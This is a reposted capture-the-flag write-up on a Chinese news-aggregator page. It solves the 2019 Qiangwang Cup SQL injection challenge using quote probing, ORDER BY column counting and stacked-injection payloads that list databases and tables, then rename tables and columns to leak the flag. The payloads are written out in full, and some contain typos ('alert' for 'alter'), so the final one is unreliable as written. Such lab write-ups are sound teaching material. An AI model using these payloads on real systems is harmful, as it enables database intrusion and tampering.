首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-06-05 19:48:44
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
90後寶媽帶孩子幹活
90後寶媽帶孩子幹活
“薇薇媽媽,有個零活你幹不幹?”小區裡一位熟識的寶媽朋友好心問我。“什麼活啊?時間自由嗎?”“給一個包子店洗菜,一天倆小時,一小時30塊錢。”“哦,家裡倆孩子,我走不開。”委婉地推辭掉寶媽的好意,我心裡有些失落。難道寶媽想找個兼職,隻能洗碗...
2026-06-05
鄉村振興路上的緻富密碼
鄉村振興路上的緻富密碼
鄉村振興路上的緻富密碼?在推進整村土地整治中,他們打破組戶界限,拆埂平丘,整塘修渠,把原來溝壑縱橫的小田窄地,改造成塘深渠暢、旱澇保收的高标準糧田,實現了田成方、路相連、渠相通、樹成行,具備了實施大型農機作業的現代化農業基礎,農業抗災減災能...
2026-06-05
悶騷型的人會怎樣
悶騷型的人會怎樣
悶騷一詞被形容為性格表現上擁有反差的人,被明騷的人所不理解。那麼除了悶騷型的人之外,還有什麼類型的人呢?他們的特征是什麼樣的呢?小編這就來給你盤點看看。來源:圖蟲作者:79053339865876100每個人都是一個獨立的個體,可以說,每個...
2026-06-05
睡覺前擡腳有什麼好處
睡覺前擡腳有什麼好處
睡覺前擡腳有什麼好處?睡覺前擡腳其實能幫助身體緩解各種小毛病,能促進血液在四肢的循環往往最好是在睡覺前15分鐘進行擡腿,有便秘情況的人群能得到明顯的改善堅持兩到三個月,便秘會大幅改善,身體也會好很多,腸道的消化功能都有一定的改善,現在小編就...
2026-06-05
這7批次食品不合格
這7批次食品不合格
天氣轉涼有沒有小夥伴和小編一樣總感覺餓得特别快忍不住想吃零食不過就在最近曝出多款食品不合格!小夥伴們快自查有沒有中招↓↓↓韓國多款粉狀食品鐵粉含量超标最高超标22倍!近期,韓國的消費者權益保護機構“韓國消費者院”對韓國網上熱銷的40款粉狀食...
2026-06-05
Copyright 2023-2026 - www.tftnews.com All Rights Reserved